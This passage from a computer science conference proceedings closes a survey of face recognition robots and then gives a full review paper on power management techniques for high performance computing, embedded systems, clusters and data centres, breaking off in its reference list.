purpose, the local binary pattern (LBP) approach for extracting the face’s feature is
done. The database obtained is also known as a trained data that is used to train the
root for face recognition by doing the complete process (Fig. 5).

6.2 The Face Tracking System

After creating the captured image database, the face can be detected in any of the
available pixels of the image in the database, and there is a coordinate corresponding
to every detected face. We also know that every captured image has a particular
resolution, e.g., the live video which is captured by a webcam has a certain resolution
like 1280*720 (or 640*360 or 640*480). Now, we need to find out the coordinate of
the detected face, which can be done by using the following formula:
w 
X, X = X +
2
 
h
Y, Y = Y +
2

where
X = initial face coordinate horizontally
W = width coordinate of face
X,X = center coordinate of the face horizontally
Y = initial face coordinate vertically
H = height of face coordinate
Y,Y = center coordinate of face vertically.
A Comparative Study on Face Recognition AI Robot 219

Fig. 5 Flowchart for complete face recognition performed by the robot


220 S. Sunar et al.

7 Limitations of Existing Work

The face recognition robot that was developed and considered one of the great
advancements of technology has saturated its application despite using various high-
end technologies and not doing anything other than capturing an image, recognizing
a face, and store the image in the database. It should have some real-time application
which could be adaptive to the surrounding and condition around it. The existing
face recognition robots are lacking in this section.
In this work, apart from face recognition, which is the heart of this project. It is
being tried to make it more beneficial for day-to-day use for safety. In the present
scenario, the whole world is fighting against Corona and wherever a person goes,
whether its office, college, schools, malls, etc. It is seen initially that a person with an
infrared thermometer to measure the body temperature. The further scope in work is
to make an AI-based robot that recognizes any person and at the same time measures
the body temperature.

8 Conclusion

The paper is presented with an aim to review the papers written and technologies
developed in the field of face recognition. The present study concludes that using the
hybrid method of computing like ANM, SVM, and SOM results in an enhanced face
recognition algorithm. In this paper, we have also described the various problems
faced during face recognition in an unconstrained environment. The issues that were
faced are also mentioned, and the reasons they need to do more study and research
were also stated. Along with it, several techniques that are used in various papers for
these topics have also been presented. Also, we have described the various methods
required to develop the most effective and efficient face recognition system. This
review paper has also tried to present various vital areas where research can be done.
This paper will also help researchers in this field who are trying to come up with
some new and efficient technology.

References

1. Mittal, S., Rai, J. K. (2016). Wadorp: An autonomous mobile robot for surveillance. In
IEEE International Conference on Power Electronics. Intelligent Control and energy systems
(ICPEICES).
2. Maneesha, K., Shree, N., Pranav, D. R., Sindhu, S. K., & Gururaj, C. (2017). Real time face
detection robot. In 2017 2nd IEEE International Conference on Recent Trends in Electronics,
Information & Communication Technology (RTEICT). https://doi.org/10.1109/rteict.2017.825
6558.
3. Viola, P., & Jones, M. (2001). Rapid object detection using boosted cascade of simple features.
IEEE Computer Society Conference on Computer Vision and Pattern Recognition, I, 511–518.
A Comparative Study on Face Recognition AI Robot 221

4. Viraktamath, S. V., Katti, M., Khatawkar, A., & Kulkarni, P. (2013). Face detection and tracking
using open CV. The SIJ Trans on Computer Network & Communication Engineering (CNCE),
1(3), 45–50.
5. Alweshah, O. A., Alzubi, J. A., & Alzubi, S. A. M. (2016). Solving attribute reduction problem
using wrapper genetic programming. International Journal of Computer Science and Network
security, 16(5), 77.
6. Sanjaya, W. S. M., Anggraeni, D., Zakaria, K., Juwardi, A., Munawwaroh, M. (2017). The
design of face recognition and tracking for human-robot interaction. In 2017 2nd Inter-
national conferences on Information Technology, Information Systems and Electrical Engi-
neering (ICITISEE), Yogyakarta, 2017 (pp. 315-320) https://doi.org/10.1109/ICITISEE.2017.
8285519.
7. Stekas, N., & Heuvel, D. V., (2016) Face recognition using Local Binary Patterns Histograms
(LBPH) on an FPGA-based system on Chip (SoC). In IEEE International Parallel and
Distributed Processing Symposium Workshop, November2016.
8. Mehra, S., & Charaya, S. (2016) Enhancement of face recognition technology in biometrics.
International Journal of Scientific Research and Education 4(8)
9. Aydin, L., & Othman, N. A. (2017) A new IoT combined face detection of people by
using computervision for security Application. International Artificial Intelligence and data
Processing Symposium (IDAP).
10. Rahim, M. A., Hossain, M. N., Wahid, T., Azam, M. S., & l. . (2013). Face recognition using
Local Binary Patterns (LBP). Global Journal of Computer Science and Technology Graphics
& Vision, 13(4), 3.
11. Tian, Y.-L., Kanade, T., & Cohn, J. F. (2001). Recognising action units for facial expression
analysis. IEEE Transactions on Pattern Analysis and Machine Intelligence, 23(2), 95–115.
12. Tathe, S. V., Narote, A. S., Narote, S. P. (2016). Face detection and recognition in videos. In
2016 IEEE Annual India Conference(INDICON).
13. Tikoo, S., & Malik, N. (2016). Detection of face using viola jones and recognition using
back propagation neural network. International Journal of Computer Science and Mobile
Computing, 5(5), 288–295.
14. Zhao, W., Chellappa, R., Rosenfeld, A., Phillips, P. J. (2003). Face recognition: A literature
survey (pp. 399–458). ACM Computing Surveys.
15. Jain, R., Gupta, D., Khanna, A. Usability feature optimization using MWOA. In S. Bhat-
tacharyya, A. Hassanien, D. Gupta, A. Khanna & I. Pan (Eds.), International Conference on
Innovative Computing and Communications (ICICC2018). Lecture Notes in Networks and
Systems, (Vol 56). Springer.
16. Hegel, F., Eyssel, F., & Wrede, B. (2010). The social robot flobi: Key concepts of industrial
design. IEEE International Symposium on Robot and Human Interactive Communication, 19,
107–112.
17. Kalas, M. S. (2014). Real time face detection and tracking using OpenCV. International Journal
of Soft Computing and Artificial Intelligence, 2(1), 41–44.
18. Thakare, N., Shrivastavaand, M., & Kumari, N. (2016). Face detection and recognition for auto-
matic attendance system. International Journal of Computer Science and Mobile Computing,
5(4), 74–78.
19. Manjunatha, R., & Nagaraja, R. (2017). Home security system and door access control based
on face recognition. International Research Journal of Engineering and Technology, 4(3),
437–442.
20. Sanjaya, W. S. M., Anggraeni, D., Zakaria, K., Juwardi, A., & Munawwaroh, M. (2017). The
design of face recognition and tracking for human-robot interaction. In 2017 2nd International
Conferences on Information Technology, Information Systems and Electrical Engineering
(ICITISEE). https://doi.org/10.1109/icitisee.2017.8285519.
State-of-the-Art Power Management
Techniques

Maaz Ahmed and Waseem Ahmed

Abstract Energy efficiency is one of the biggest challenges presently faced by high
performance computing (HPC) systems. The need to build energy-efficient computer
systems and applications in the field of scientific computing is growing every day.
Numerous researches have been carried out in the fields of embedded systems and
mobile computing to minimize the power consumed by devices. The components
and algorithms developed for achieving energy efficiency in such systems can also
be applied in the field of HPC. In this paper, we survey the power managing tech-
niques for HPC systems. We discuss different power management techniques on
several important parameters to identify the merits and demerits of such techniques.
This paper is intended to help in developing more deep understanding of different
power management techniques and designing more energy-efficient HPC systems of
tomorrow.

Keywords HPC · Green computing · Energy efficiency · Power management ·


Power-aware

1 Introduction

Power usage by the virtual systems has trespassed all of its tolerable limits and has
become a cause for major concern, since the majority of day-to-day affairs across
the world are linked either directly or indirectly to the virtual transactions through
computer networks. As per the reports, large-scale data centers in USA consume
around 70 billion kWh, which represents 2% of the energy consumption of the country
[1]. The inability to meet such a huge consumption leads to the temporary delay or
shutdown of the several data center projects. High-density power consumption results

M. Ahmed (B)
HKBK College of Engineering, Bangalore, India
W. Ahmed
Faculty of Computing and Information Technology, King Abdulaziz University, Jeddah, Saudi
Arabia

© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 223
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_18
224 M. Ahmed and W. Ahmed

in overheating of the components, thereby resulting in additional energy expenditure


on cooling mechanisms.
Another damaging effect of consumption of high power is increase in environment
pollution. A report by the US Environmental Protection Agency (EPA) states that
for every 1000 kWh of energy consumed 0.72 tons of C O2 are released into the
atmosphere [2]. Furthermore, increase in consumption of power directly leads to a
rise in temperature inside the system, followed by its failure.
According to Feng and Wu-Chun in [3], for every 10°C rise in temperature, the
failure rate doubles for a computing node. Thus, consumption of power is a big
concern for researchers and leading vendors. As the energy consumed by mobiles
and other embedded systems determines the battery life of these systems, the concept
of power-aware computing was introduced in the 1990s for these systems that run
on batteries. However, power management is essential for modern equipments and
is in demand for high performance computing (HPC) systems. The inefficiency of
existing HPC systems with regard to controlling the energy consumption adds value
to this demand.
According to Ge et al. [4] five supercomputers averaged 54%_ 71% of the peak
performance on the optimized benchmark package. However, it was found to be
worse in case of scientific applications where the performance was only 10% of
the peak [5]. The study also found that it could be due to the unequal distribution
of nodes in the clusters during various activities such as computing, communicat-
ing, and input/output (I/O) activities. The components that execute faster consume
some energy while waiting for the slower components; hence, during such idle or
slack times, the nodes could be slowed or even shut down to save energy. This paper
reviews the studies that are related to previously and presently existing power profil-
ing techniques, power management techniques, and power simulators and attempts
to identify the merits and demerits of such techniques.
The remainder of this paper is organized as follows. Section 2-6 provides an
overview and classification of power management techniques and Sect. 7 provides
concluding remarks and also discusses the future challenges.

2 Static Power Management

The replacement of high power components with low power components to save
power is referred to as static power management.
Rivoire et al. [6] suggested JouleSort, to evaluate the energy efficiency. The study
revealed that JouleSort was approximately three times energy efficient compared to
the existing techniques. However, JouleSort did not consider all the possible energy-
related concerns of multimedia applications since it focused on data management
tasks.
Caulfield et al. [7] described a new system architecture known as Gordon for
reducing the consumption of power and for increasing of data-intensive applica-
tions performance. They combined flash memory with power-efficient processors for
State-of-the-Art Power Management Techniques 225

reducing the power consumption. They studied impact of flash storage and Gordon
architecture on the power efficiency and performance of data-centric applications.
The findings revealed that Gordon systems performed better than the disk-based
clusters by 1.5 times and delivered up to 2.5 times more improved performance per
watt.
Andersen et al. [8] made an attempt to modify the conventional architecture of
data-intensive clusters to minimize the power consumption without any compromise
in their capacity, latency, availability, and throughput. They presented an architecture
known as fast array of wimpy nodes (FAWN), where the energy-efficient CPUs are
combined with flash storage to provide faster and more efficient random access to
data. The analysis revealed that FAWN clusters have the capability of handling 350
key-value queries per Joule of energy which is two times more than the disk-based
system.
Hammilton [9] identified that the cost of delivering high-scale services was mainly
dependent on the hardware and power required for the services. The study investi-
gated power dissipation in high-scale data centers. It was found that low-power
servers yielded the same aggregate throughput effectively at additional cost com-
pared to the high-power servers.
Vasudevan et al. [10] experimentally evaluated FAWN, which consists of a large
number of slower but efficient nodes coupled with low-power storage. The study
used a set of microbenchmarks to check the maximum performance of the wimpy
nodes. The findings revealed that the overall performance of low-frequency nodes
was found to be more than the conventional high-performance CPUs.
However, there are some limitations in this architecture which was pointed out
by Valentini et al. [11]. According to them, the major concern is the feasibility of
FAWN architecture to solve problems that cannot be parallelized or the working set
size cannot be further divided and assigned to the available memory of the smaller
nodes.

3 Dynamic Power Management

According to Liu and Hsu in [2] dynamic speed scaling (DSS) and dynamic resource
sleeping (DRS) are the two variants of dynamic power management (DPM). In DSS,
consumption of power of the processor is controlled by modulating its speed. Thus,
the performance is compromised depending on the necessity. Dynamic voltage scal-
ing (DVS) operates by changing the voltage, i.e., either increasing or decreasing the
voltage according to circumstances. If we require more of performance, we increase
the voltage and this is called overvolting, and if we want to save power, we decrease
the voltage and this is known as undervolting. Similarly, dynamic frequency scal-
ing (DFS) operates by scaling frequencies. Dynamic voltage and frequency scaling
(DVFS) operates by curtailing the frequency and/or supply voltage to the processor.
Thermal throttling depends upon the temperature of the processor. Multifrequency
memories, on the other hand, diminish the working frequency with the help of mul-
226 M. Ahmed and W. Ahmed

tispeed disks. Increased energy consumption due to transition in the states of per-
formance is one of the limitations of these mechanisms. Moreover, it is responsible
for the increased resource latency overhead. DRS inactivates (power-off) the com-
ponents of the computer to conserve energy and activates them when required. The
power on and off states are described as C0 and Cn, respectively. This mechanism
is restricted by the amount of time and energy spent on the transition from inactive
state to active state.
Ge et al. [12] recommended performance-based distributed DVS techniques for
power-aware HPC clusters. The study performed a comparative analysis of various
available DVS techniques on a power-aware cluster while executing parallel scien-
tific applications and pointed out that DVS scheduling techniques achieved significant
energy savings. The study found out that DVS scheduling techniques achieved 36%
total energy savings with no loss in performance. However, depending on the applica-
tion, we have varied energy savings, system workload, and the DVS strategy. Another
drawback identified in this study was that these techniques were implemented largely
by manual means and should be replaced by modern automated ones.
Hotta et al. [13] introduced a power-performance optimization technique based
on the power profiles generated in high-performance PC cluster by using DVFS
scheduling. The execution of the program was split into several sections, and the
best section for power efficiency was selected. Selecting the best was not an easy and
direct task as the overhead of DVFS transition is not free from errors. An optimiza-
tion algorithm was proposed to select a gear while also considering the transition
overhead. Power-profiling system known as PowerWatch was designed to examine
the efficiency of the optimization algorithm. The findings revealed that the study
achieved almost 40% reduction in terms of energy delay product (EDP) without any
major impact on its performance.
Rajamani et al. [14] designed a novel approach aimed at power management
for which the critical workload indicators, power and performance usage of the
applications were continuously monitored. They proposed two solutions, namely
performance maximizer which identifies the best performance under specific power
constraints and powersaver which minimizes the power consumption while main-
taining optimum performance levels.
The study by Freeh et al. [15] presented a system known as jitter, which reduces
the processor’s frequency in a cluster to minimize its power consumption. Jitter
reduces the energy spent by the nodes at synchronization points during various slack
times, thereby achieving significant reduction in the energy consumed. The findings
showed that jitter saved 8% of the energy consumed with 2% time penalty on an
unbalanced program.
According to Khargharia et al. [16], power management techniques can be clas-
sified into the following types, hardware-based power management, turning off idle
devices, quality of service (QoS), and energy trade-offs. Hardware-based power man-
agement involves varying the voltage and frequency of the processor according to
the performance requirements. Turning off devices is yet another DPM technique in
which the devices are turned on/off wholly to reduce the power consumption. This
technique can be used in both battery-operated devices and servers. QoS and energy
State-of-the-Art Power Management Techniques 227

trade-offs technique involve saving more power at the cost of performance efficiency
within the acceptable limits. They presented a theoretical framework (Automatic
Memory Management) for optimizing power and performance in data centers dur-
ing runtimes automatically with the help of a multichip memory system.
Laszewski et al. [17] used DVFS to minimize power consumption in virtual
machines. The study proposed and implemented a scheduling algorithm that allo-
cates virtual machines in a DVFS-enabled cluster by dynamically scaling the supply
voltages. Simulation techniques were used by the study to analyze the algorithm.
Performance analysis of the study revealed that design and implementation of such
scheduling algorithms achieved significant reduction in the power consumption.
Huang and Feng [18] used a specific workload characterization that infers the
CPU stall cycles due to off-chip activities. The study presented a power-aware, eco-
friendly, run-time algorithm based on this workload characterization. In order to
scale the voltage and frequency supplied to the processor in a parallel computing
environment and to obtain the workload characterization, the algorithm dynamically
monitored the processor state. The algorithm was found to achieve the best perfor-
mance control over the b-adaptation algorithm and Linux ondemand governor by
achieving 11% savings in the overall energy consumed.
Etienne and Gernot [19] analyzed the efficiency of DVFS on three cutting-edge
generations of AMD Opteron processors by implementing memory-bound bench-
marks. The study showed that the effectiveness of DVFS was found to be low on
new platforms and the actual savings were observed only when the execution times
were shorter (at higher frequencies) and were “padded” with the energy consumed
when idle.
Alvarruiz et al. [20] proposed a work called CLUES which replaces idle state with
power off state. The system was integrated with the help of different HPC cluster
middleware such as batch-queuing systems and cloud management systems. Pow-
ering on and off of the computing nodes was performed with the help of different
mechanisms such as Power Device Units, Wake-on-LAN, Intelligent Platform Man-
agement Interface, or other infrastructure-specific mechanisms. The performance of
the model was evaluated against two real use cases involving two different HPC
clusters. The findings revealed energy and cost savings of about 38% and 16%,
respectively. However, one limitation of the study was that it considered only the
nodes with homogenous energy consumption.
An optimization strategy that uses both voltage scaling and chip parallelism
was proposed by Ozturk et al. [21] for voltage island-based embedded design. The
approach makes use of compiler which uses heterogeneity in parallel execution where
different voltages and frequencies to different processors were applied to reduce the
consumption of energy without increasing the overall execution cycles. Experiments
were carried out with the help of different applications, and the results revealed that
the optimization technique is capable of yielding energy benefits at a large scale.
228 M. Ahmed and W. Ahmed

4 Power Management in Embedded Systems

Embedded systems have size and cost constraints. The battery size is very small
and the surface area of embedded system is less, which results in less amount of
heat dissipation. Therefore, embedded systems require proper cooling systems. In
some of the embedded applications such as video and audio playback and gaming,
the ratio of processor’s runtime to idle time is very high. In such devices, dynamic
power management techniques can help to reduce the power consumption at runtime.
Pedram [22] reviewed the tools and techniques adopted for power management
in embedded systems. They considered the hardware platform, the application soft-
ware, and the system software for their analysis. The concepts and techniques were
illustrated with the help of design examples from an Intel Strong ARM-based sys-
tem. The study was not intended to be a comprehensive review, yet it served as a
base for a comprehensive understanding of power-aware design methodologies and
techniques for embedded systems.
Brock and Rajamani [23] designed a generic power management system to man-
age energy and power efficiently in embedded systems. According to the design,
power management strategy can be varied based on the application. DPM strategy
refers to the policies for power optimization designed by the system designer. How-
ever, activation of these policies/strategies is controlled by the policy manager.
Agarwal et al. [24] used on-demand paging scheme for increasing the energy effi-
ciency of wireless network embedded systems. The study implemented on-demand
paging scheme on an infrastructure-based WLAN which consisted of iPAQ PDAs
equipped with Bluetooth radios and Cisco Aironet wireless networking cards. The
findings of the study exhibited power savings that range from 23% to 48% over
802.11b standard operating modes with trivial impact on performance. One major
drawback of the design is that it was prototyped in the low-power BT radios, and
the performance of the scheme on high-power large sensor-based networks remains
uncertain.
Raghunathan and Chou [25]studied the various issues and trade-offs involved in
designing and implementing energy-saving techniques in embedded systems. System
design techniques which involve extracting energy from the environment and making
it available for consumption by the system were explained by their study. The study
described various power management techniques which considered the different
spatiotemporal characteristics of energy availability and energy usage within a system
and across network. As a conclusive remark, the study suggested that the entire system
from the design of architecture to the power management must be optimized in a
holistic way at the application and networking levels to operate harvesting systems
accurately.
Choi [26] used DC-DC converters as a source for solving the problem of mini-
mizing energy in embedded systems. The study analyzed the impacts of the variation
in the efficiency of DC_ DC converters while executing a single task and also by
implementing DVS scheme. The study puts forward the DC DVS technique for
dc_ dc converter to minimize its energy consumption. The characteristics of DC_
State-of-the-Art Power Management Techniques 229

DC converters were embedded into the DVS techniques to perform multiple tasks.
Finally, the study proposed a technique named DC CONF for generating a DC_ DC
converter and presented an integrated framework to address the DC_ DC converter
configuration and DVS simultaneously. The results of the experiment indicated that
Dc-Ip saved up to 24.8% of energy when compared to other existing power manage-
ment schemes, which do not take the efficiency variation of DC_ DC converters into
account.
Park et al. [27]presented a compiler-based method for the preservation of the
leakage power during the code execution, which mainly arises due to the insertion
of power gating instructions into a code to activate/deactivate (i.e., ON/OFF) the
functional units in a microprocessor. The study proposed a polynomial time optimal
algorithm called PG-instr to minimize the total power leakage by considering the
power and delay overhead on power gating. The study also found out that the algo-
rithms were adaptable to other power gated resources such as diverse memory units
and multicores as well.

5 Power Management Techniques for HPC Clusters

Power management in HPC clusters focusses on increasing its efficiency in terms of


energy, power capping, and thermal management. Pinheiro et al., and Chase et al. in
[28] and [29] reported energy-efficient techniques that are based on load concentra-
tion policy (LCP) and service level agreement (SLA), respectively. The efficiency
was attained through trade-offs by distributing the load and switching on the nodes
when needed. The servers undergo transition from high power state to low power
state, when they are idle thereby reducing the wastage of energy. This system was pri-
marily functional for homogeneous clusters, where all the servers are assigned with
the same application running at the same frequency. Other techniques for increasing
energy efficiency are popular data concentration and massive array of idle disks that
conserve energy. They work by reducing the speed of one disk and copying the data
into a high-velocity disk. Diverted access technique uses redundancy and enhances
the idle time, thereby conserving disk energy. Power capping is a mode of setting
an optimum level of safety threshold of power consumption, thereby regulating the
cluster to avert the actual power from surpassing the fixed budget. This can also act
as the safety mechanism to circumvent any power supply spikes [30]. The initial step
involved is sensing the power, followed by controlling the power throttle. Examples
of such type of controllers have been reported by [31–33]. In the first case [31],the
controller was complemented with a management agent working on each server.
This agent monitors the local power through runtime power measurement and power
control. The controller systematically amasses local readings entirely and computes
the total power consumption of the cluster. When the total consumption crosses the
estimated power budget limit, the controller throttles the server to the predefined
level. In the second case [32], the power is distributed and allocated inconsistently
to each node depending upon the power demand.
230 M. Ahmed and W. Ahmed

Wang and Chen [33] developed a new control algorithm called multi-input-multi-
output (MIMO) for multiple servers working in harmony. Within every control cycle,
the controller compiles the power consumption and CPU application for each server,
then calculates a new CPU frequency for each processor and addresses each processor
to alter its frequency in an integrated way.
Liu and Zhu [2] detailed the thermal management technique used in commercial
clusters which involves throttling or reducing the amount of dissipated heat. This
reduction is important as high temperatures make the systems unreliable and costly.
Skadron et al. [34] developed a proportional–integral–differential (PID) controller
to regulate the heat produced. It followed three steps: 1. proportional action, where
power was regulated to decrease the amount of errors, 2. integral action, where power
was adjusted corresponding to the time integral of errors occurred in the past and
maintained at a zero-error state, and finally 3. derivative action, where any overshoot
is circumvented by damping the response and providing stability to the controller.
Taffoni et al. [35] have evaluated the impact of computation on consumption of
energy of two applications from astrophysical domain. The evaluation is done on three
different systems, an Intel-based cluster, a prototype of an Exascale supercomputer,
and a microcluster based on ARM MPSoC which have the least energy consumption
but at the cost of slowing down the performance.

6 Power Management in Data Centers

Data centers host a wide range of Internet facilities such as Web hosting, e-commerce
services, banking, retail commerce, and cloud computing. These wide range of func-
tions require very high power which in turn requires advanced cooling configurations.
Hence, it is understood that energy consumption in large-scale data centers imposes
electricity costs which makes power and energy consumption the two main concerns
in data centers. Expensive uninterrupted power supplies and backup power gener-
ators were needed in cases of peak power requirements [36]. Power management
techniques that were adopted for battery-held devices cannot be used in the context
of servers because server workloads and operating environments are different from
battery-operated devices.
Chen et al. [37] proposed the first dedicated framework to reduce the energy
consumption in servers at hosting centers that run multiple applications to meet
performance-based service-level agreements (SLAs). The study used steady-state
queuing analysis, feedback control theory, and a hybrid mechanism that is based
on both steady-state queuing and feedback control theory. The study results proved
that the solutions provided by the framework were found to be more adaptive to the
workload behavior while performing server provisioning and speed control when
implemented with the help of real Web server traces.
The power consumption behavior of large-scale servers that execute different
classes of applications was studied by Fan et al. [30]. The study found that there
exists a distinct gap (about 40%) between the observed and theoretical power usage
State-of-the-Art Power Management Techniques 231

values in data centers even while executing well-tuned applications. The study used a
modeling framework to estimate the power-saving efficiency of power management
schemes. The findings revealed that power and energy savings were found to be
greater at the cluster level (thousands of servers) than at the rack level (tens of servers).
The study pointed out the necessity of the systems to remain power efficient not only
across the activity range, but also during its peak performance.
Raghavendra et al. [38] presented a coordinated multilevel power management for
data centers. The study proposed a power management technique that combined dif-
ferent individual power management approaches. The simulation results were based
on 180 server traces from nine different real-world enterprises which demonstrated
the correctness, stability, and efficiency advantages of the solution proposed by the
study. Furthermore, the study with its unified model performed a detailed quantitative
sensitivity analysis regarding the impact of different architectures, implementation
styles, sizes of workload, and system design choices on power management.
Narayanan et al. [39] proposed a technique called “write off-loading” to conserve
energy in enterprise storage. The write requests on spun-down disks were temporar-
ily redirected to a persistent storage elsewhere in an enterprise data center. This in
turn alters the I/O access pattern that generates significant idle periods during which
the volume’s disks can be spun down. This saves the energy consumed. The study
analyzed potential savings using real-world traces collected from thirteen servers in
the data center. The findings showed that significant energy savings were achieved by
spinning down the idle disks. Also, as write off-loading creates longer idle periods, it
helps in saving large amounts of energy. The study validated the analysis by imple-
menting the write off-loading on a hardware testbed and measured its performance.
The evaluation confirms the analysis by showing 28–36% reduction in the energy
consumption by just spinning down the disks and 45–60% reduction by using write
off-loading.
Govindan et al. [40] designed a technique based on controlled provisioning, statis-
tical multiplexing, and over-booking for provisioning the power infrastructure in data
centers. The evaluation of a prototype data center proved the feasibility and benefits
of the technique. The study results show that the adopted technique achieved double
the CPW offered by the Power Distribution Unit executing TPC-W, an e-commerce
benchmark, by accurately identifying the peak power needs of hosted workloads.
A 10% overbooking in the PDU-based conclusions of power profiles yielded 20%
additional improvement in PDU throughput with minimal loss in performance.
Leverich et al. [41] used Per Core Power Gating (PCPG) for additional power
management in multicore processors. The study was conducted on a commercial 4-
core chip with the help of real-world application traces from enterprise environments.
PCPG was found to reduce 40% of the energy consumed by the processor without any
significant performance overheads. Furthermore, when compared with DVFS, PCPG
was found to be more effective in saving 30% more energy. The study suggested
to implement DVFS and PCPG together, which can save up to 60% of the power
consumed.
Liu et al. [42] addressed the challenges faced by elastic power management in
Internet data centers. They analyzed the resource provisioning and utilization patterns
232 M. Ahmed and W. Ahmed

in data centers and proposed a macroresource management layer that can coordinate
the various cyber and physical resources. They also reviewed some of the existing
solutions for resource management along with its limitations. The study pointed out
the importance of a coordination layer to aid in resource utilization after carefully
monitoring the cyber-activities and physical dynamics in data centers. The study
asserted it as a challenging goal that requires breakthroughs in many areas of research
such as data management, resource and software abstraction, sensing, modeling,
control, and system design. According to the study, the service requests that hit
the data centers must be coordinated with the physical resources to provide both
operational and energy efficiency.
Urgaonkar et al. [43] explored the power management and optimal resource allo-
cation in virtual data centers with heterogeneous applications and have time-varying
workloads. The study used the system queuing information in order to make online
control decisions. Furthermore, the study used a specific technique known as Lya-
punov optimization to design an online admission control, routing, and resource
allocation algorithm for a virtual data center. The findings revealed that the algo-
rithm maximizes a joint utility of the average application throughput and manages
the power and energy costs of the data center.
Beloglazov and Buyya [44] proposed a resource management policy for dealing
with power-performance trade-offs in the case of cloud data centers. The findings of
the study justified the statement that dynamic reallocation of virtual machines and
turning off the idle nodes to reduce power consumption to yield the promised QoS
will save a substantial amount of energy.
Lin et al. [45] examined the amount of power saved by dynamic “right-sizing”
the data center. The servers were turned off during the idle periods, and an online
algorithm was used to check the amount of power savings achieved. According to the
study, the simple structure of an optimal offline algorithm for dynamic right-sizing
has been exploited to design a new lazy online algorithm which is three times more
competitive. The study validated the algorithm using traces from two real data center
workloads and showed that if PMR of a data center is greater than 3, then the cost
of toggling a server will be less than a few hours of server costs, and less than 40%
background load.

7 Conclusion

In this paper, we have reviewed various studies related to power management tech-
niques in embedded systems, HPC systems, HPC clusters, data centers, and virtual
environment.
The studies related to the static power management bring out some of the major
shortcomings which include lapse in the energy concerns related to multimedia appli-
cations, since the study focused mainly on data management tasks [6]. Valentini et al.,
[11] pointed out the limitations related to the popular architecture, FAWN and also
highlighted the concern regarding the feasibility of FAWN architecture. He pointed
State-of-the-Art Power Management Techniques 233

out that FAWN architecture can neither be parallelized nor its working set size can
be further divided to be assigned into the available memory of the smaller nodes.
Some of the major limitation which the study came across as a result of the in
depth review of power management in embedded systems include compatibility of
the design models with high power devices [24] and the optimization of the entire
system from design architecture to power management for the proper operation of
these systems [25]. Studies related to the power management techniques for HPC
systems showed a series of constrains and shortcomings which include, long request
time delay [46], energy saving/time delay [47], Cooling cost, temperature threshold
[48], utilization threshold [49], failure rate, temperature constraints, power budget
[50] and performance [33, 51, 52].
The review of studies pertaining to dynamic power management revealed some of
its limitations such as application of the models limited only to homogenous systems
[20]. The energy savings were found to be dependent on application, workload sys-
tem, and DVS strategy. Furthermore, most of the techniques used were implemented
manually which should be replaced by modern automated ones [12].
The studies which describe the power management techniques adopted by various
functional areas revealed some major snags that need to be addressed and rectified.
Reviews of the studies about power management in the data centers brought out a
serious limitation regarding the practical applicability of the frameworks as many of
them are just theoretical works and are not successfully implemented in any of the
platform [37, 44].
The gaps mentioned above paves the way to design a optimized power manage-
ment technique for HPC.

References

1. Shehabi, A., Smith, S., Sartor, D., Brown, R., Herrlin, M., Koomey, J., Masanet, E., Horner,
N., Azevedo, I., & Lintner, W. (2016). United states data center energy usage report.
2. Liu, Y., & Zhu, H. (2010). A survey of the research on power management techniques for
high-performance systems. Software: Practice and Experience, 40(11), 943–964.
3. Feng, W.-C. (2003). Making a case for efficient supercomputing. Queue, 1(7), 54.
4. Ge, R., Feng, X., Song, S., Chang, H.-C., Li, D., & Cameron, K. W. (2010). Powerpack: Energy
profiling and analysis of high-performance systems and applications. IEEE Transactions on
Parallel and Distributed Systems, 21(5), 658–671.
5. Pinheiro, E., Bianchini, R., & Dubnicki, C. (2006). Exploiting redundancy to conserve energy
in storage systems. ACM SIGMETRICS Performance Evaluation Review, 34(1), 15–26.
6. Rivoire, S., Shah, M. A., Ranganathan, P., & Kozyrakis, C. (2007) Joulesort: A balanced energy-
efficiency benchmark,” in Proceedings of the 2007 ACM SIGMOD international conference
on Management of data. ACM (pp. 365–376).
7. Caulfield, A. M., Grupp, L. M., & Swanson, S. (2009). Gordon: using flash memory to build fast,
power-efficient clusters for data-intensive applications. ACM Sigplan Notices, 44(3), 217–228.
8. Andersen, D. G., Franklin, J., Kaminsky, M., Phanishayee, A., Tan, L., & Vasudevan, V. (2009).
Fawn: A fast array of wimpy nodes. In: Proceedings of the ACM SIGOPS 22nd symposium on
Operating Systems Principles. ACM (pp. 1–14).
234 M. Ahmed and W. Ahmed

9. Hamilton, J. (2009). Cooperative expendable micro-slice servers (cems): low cost, low power
servers for internet-scale services. In Conference on Innovative Data Systems Research
(CIDR’09)(January 2009).
10. Vasudevan, V., Andersen, D., Kaminsky, M., Tan, L., Franklin, J., & Moraru, I. (2010). Energy-
efficient cluster computing with fawn: Workloads and implications. In Proceedings of the 1st
International Conference on Energy-Efficient Computing and Networking. ACM (pp. 195–
204).
11. Valentini, G. L., Lassonde, W., Khan, S. U., Min-Allah, N., Madani, S. A., Li, J., et al. (2013).
An overview of energy efficiency techniques in cluster computing systems. Cluster Computing,
1–13.
12. Ge, R., Feng, X., & Cameron, K. W. (2005). Improvement of power-performance efficiency
for high-end computing. In 19th IEEE International Proceedings on Parallel and Distributed
Processing Symposium, 2005. IEEE (pp. 8–pp).
13. Hotta, Y., Sato, M., Kimura, H., Matsuoka, S., Boku, T., & Takahashi, D. (2006). Profile-
based optimization of power performance by using dynamic voltage scaling on a pc cluster. In
Parallel and Distributed Processing Symposium, 2006. IPDPS 2006. 20th International. IEEE
(pp. 8–pp).
14. Rajamani, K., Hanson, H., Rubio, J., Ghiasi, S., & Rawson, F. (2006). Application-aware
power management. In 2006 IEEE International Symposium on Workload Characterization.
IEEE (pp. 39–48).
15. Freeh, V. W., Kappiah, N., Lowenthal, D. K., & Bletsch, T. K. (2008). Just-in-time dynamic
voltage scaling: Exploiting inter-node slack to save energy in mpi programs. Journal of Parallel
and Distributed Computing, 68(9), 1175–1185.
16. Khargharia, B., Hariri, S., & Yousif, M. S. (2008). Autonomic power and performance man-
agement for computing systems. Cluster computing, 11(2), 167–181.
17. Von Laszewski, G., Wang, L., Younge, A. J., & He, X. (2009) Power-aware scheduling of virtual
machines in dvfs-enabled clusters. In IEEE International Conference on Cluster Computing
and Workshops, 2009. CLUSTER’09. IEEE (pp. 1–10).
18. Huang, S., & Feng, W. (2009) Energy-efficient cluster computing via accurate workload char-
acterization. In Proceedings of the 2009 9th IEEE/ACM International Symposium on Cluster
Computing and the Grid. IEEE Computer Society (pp. 68–75).
19. Le Sueur, E., & Heiser, G. (2010) Dynamic voltage and frequency scaling: The laws of dimin-
